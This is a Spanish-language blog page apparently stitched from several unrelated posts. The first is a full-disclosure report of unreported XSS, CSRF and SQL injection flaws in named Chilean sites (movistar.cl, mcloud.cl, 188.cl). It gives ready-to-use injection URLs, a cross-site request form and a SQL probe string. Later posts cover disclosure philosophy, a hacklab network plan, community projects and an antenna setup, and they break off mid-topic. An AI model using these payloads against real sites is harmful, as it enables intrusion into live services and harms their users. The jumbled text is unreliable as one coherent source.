Reportamos en Secureless una serie de vulnerabilidades XSS y CSRF que afectan al sitio web de Movistar y a sitios relacionados a la empresa. Los sitios afectados son:

• http://www.movistar.cl
• http://www.mcloud.cl
• http://www.188.cl

Las vulnerabilidades detectadas nuevamente ponen en riesgo la seguridad del usuario aprovechandose de la confianza que existe desde el usuario hacia el sitio y viceversa.
El estado de estas vulnerabilidades es hasta ahora “Sin Reportar”, ya que por más que buscamos en el sitio web y tambien ayudandonos con google, no pudimos encontrar ningún formulario ni correo de contacto sin que nos pidiera registrarnos o ser clientes. Sólo lo reportamos vía twitter haciendo un reply a la cuenta de @MovistarChile.

XSS en Movistar.cl:

URL: http://www.movistar.cl/PortalMovistarWeb/appmanager/Porta%3Cscript%3Ealert(/xss/)%3C/script%3EalMovistar/portal?_nfpb=true&_pageLabel
Error: Al generar un error404, el sitio no está validando los parametros pasados, por lo que si intentamos entrar a un sitio con un nombre como el ejemplo de más arriba, lo interpreta.

XSS (2) en Movistar.cl

URL: http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=%22;%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Error: No valida las variables de entrada. En este caso permite inyectar codigo htm/javascript en la variable “q” pasada por GET o por POST mediante el formulario de búsqueda.

CSRF en Movistar.cl

El mismo formulario de búsqueda permite realizar peticiones GET y POST desde otros sitios, sin utilizar ningún tipo de validación ni token anti_csrf.
Por ejemplo, con este código HTML:

<form action=”http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656″
id=”cse-search-box” method=”post” style=”margin-top: 7px; margin-right: 2px”><div><input id=”idsearch” type=”text” name=”q” size=”31″/><a
href=”http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.movistar.cl/PortalMovistarWeb/appmanager/PortalMovistar/portal?_nfpb=true&_pageLabel=P12200150661236808023656&q=aaaaaaa%22;%20asasasasa#”
id=”btn_buscadorMovistar” target=”_parent”>a</a></div></form>

Si buscamos el string “;<script>alert(/xss/)</script> nos aparecerá el alert javascript.

CSRF en MCloud.cl

URL: https://www.mcloud.cl/cp/ps/Main/login/Authenticate
Error: Es posible realizar un login de forma remota o enviar parametros al servidor desde un formulario externo al sitio mcloud.cl, sin utilizar ningún tipo de validación ni token anti_csrf.

SQL Injectoin en 188.cl

URL: http://www.188.cl/?area=%27having%201=1–
Error: Simplemente no validan ni escapan los valores pasados por GET a la variable “area”

Links

- Unreported XSS in Movistar.cl
- Unreported XSS+CSRF in Movistar.cl
- Unreported SQL Injection in 188.cl
- Unreported XSRF in mcloud.cl

Secureless nace simplemente de la necesidad de investigar y aprender aun mas sobre este tipo de vulnerabilidades y seguridad en la web. Aunque a muchos no les parezca lo correcto, con el tiempo nos hemos dado cuenta que las fallas se corrigen mucho mas rapido cuando son publicadas y creemos que de esta forma podemos ayudar a que los sitios sean más seguros.

Lo que buscamos en esta version es explorar un poco más en el mundo de la (in) seguridad en aplicaciones web. En esta primera version agregamos la posibilidad de que la gente pueda reportarnos mediante un mensaje cifrado sitios vulnerables y de esta forma poder contribuir de forma “segura” a este proyecto, aunque la mayoría (99%) de los sitios publicados son producto de nuestra propia invesgitacion, agradecemos a quienes nos apoyan y nos envian información al respecto.

Como primera anecdota, tuvimos el caso de NIC Chile quien fue notificado al mismo tiempo de publicar la vulnerabilidad en Secureless, quienes resolvieron el problema en menos de 20 minutos. La vulnerabilidad que afectaba a NIC Chile era de tipo XSS en uno de sus scripts cgi.

Ya estamos planificando noches de “hacking” para dedicarnos a seguir publicando sitios importantes con fallas de seguridad.

Links:

- Twitter @secureless

- Secureless.org

El esquema de lo que tenemos en mente es el siguiente:

Podemos ver tres antenas sobr ela torre triangular, las identifiqué como “verde”, “roja” y “negra”. El color verde simboliza nuestra LAN y nuestra WLAN y la roja nuestra DMZ donde se encuentran nuestros servidores con nombres de personajes de los simpsons.
La idea principal de todo esto es tener dos redes separadas, nuestra WLAN y LAN que simplemente tenga acceso a internet y que nuestra DMZ tenga entrada y salida a internet, mediante una VPN, un tunel o como sea, la idea es dejar abierto los servidores al público y en algun momento (cuando armemos el proyecto) entregar accesos a shell para servicios de anonimato para quienes lo necesiten.

1. Gibbio: Junto a Rodolfo Berrios comenzamos un proyecto patrocinado/auspiciado por Sergio Escoté, Gibbio es un proyecto de red social al mas estilo Yahoo! Answers o Askville de Amazon, en simples palabras es una Web 2.0 donde la gente podra compartir (buscar/encontrar) lo que necesite en base a preguntas y respuestas tageadas y categorizadas bajo un criterio colectivo, donde cada pregunta y respuesta podra ser valorada segun el criterio de quien la este leyendo. La idea es lanzar una beta en poco tiempo mas.
2. Hackreta: Hace mas o menos un año que me integre a Hackreta Hacklab y desde ese entonces han pasado muchas cosas, gente que se ah retirado, gente nueva … Actualmente estamos intentando sacar el Hacklab adelante, de apoco vamos trabajando y uniendo fuerzas los antiguos y los nuevos. Poco a poco nos vamos planteando metas a corto plazo para poder realizarlas y evaluamos como vamos avanzando, nuestro proximo objetivo es dar una buena presentacion/impresion en el Flisol (Festival Latinoamericano de instalacion de Software Libre) de este año mostrando algunas cosas que realizaremos como un Multimedia Center entre otras cosas.
3. KernelHouse: Este proyecto lleva solo algunos meses en pie y es algo que suena muy bonito pero que cuesta bastante llevar adelante. Kernel de núcleo y House de casa, la idea es formar una comunidad de organizaciones sin fines de lucro y libres, en esta casa existen varios colectivos o grupos sociales y ademas, muchas ideas creativas e integrantes. Actualmente en esta casa se hacen talleres/clases de Tango, lugar de ensayo para la compañia de teatro La manojo Teatro, el Hacklab Hackreta y recientemente un estudio de grabacion llamado Empty Records conocido como El lado oscuro. KernelHouse es una organizacion centralizada de todos los colectivos que participan en la casa de forma independiente.
4. Noubuntu: Aunque ya he recibido la critica de muchos (y algunas criticas muy destructivas), junto con corrideat decidimos continuar con esta ideologia y pensamiento respecto a lo que genera una distrbucion Linux tipo Ubuntu. Migramos el servidor, nos mudamos a WordPress y lanzamos con mas fuerzas que nunca el nuevo sitio y ya hemos tenido varias visitas y varias criticas constructivas y destructivas.
5. Chevereto: Hace un tiempo me uní a este proyecto y actualmente soy el unico desarrollador, por lo que el avance avanza muy lento (tambien ocupo mi tiempo en otras cosas). Es un proyecto, tambien junto a Rodolfo Berrios, que trata de crear un motor de hosting de imagenes gratuito y libre, asi como existe Imageshack y otros hosting de imagenes, la idea es que este sea descargable y montable en cualquier servidor o pc. Actualmente es el motor de Godlike.

Largas horas en el techo de la casa, buscando señales, fijando la antena y por obviamente tomando cerveza. Logramos conectarnos a una señal que según estudios anteriores era de 5mbps, con una “potencia” entre -76 y -82dBm logramos conectarnos y descargar a grandes velocidades. En un principio las descargas no bajaban de los 60kb/s y llegando a un tope de 140kb/s, poco a poco fuimos moviendo la antena y apuntandola mejor hasta lograr una conexion optima, descargando a una velocidad entre 250 y 300kb/s. Ya estabamos satisfechos y bajamos al laboratorio a actualizar los PC, a instalar, en fin, a “aprovechar” nuestro gran ancho de banda.
Durante la noche logramos logramos un record de descarga a 620kb/s , conectados con una velocidad de subida y bajada de 6000kbps.
Asi quedo la antena: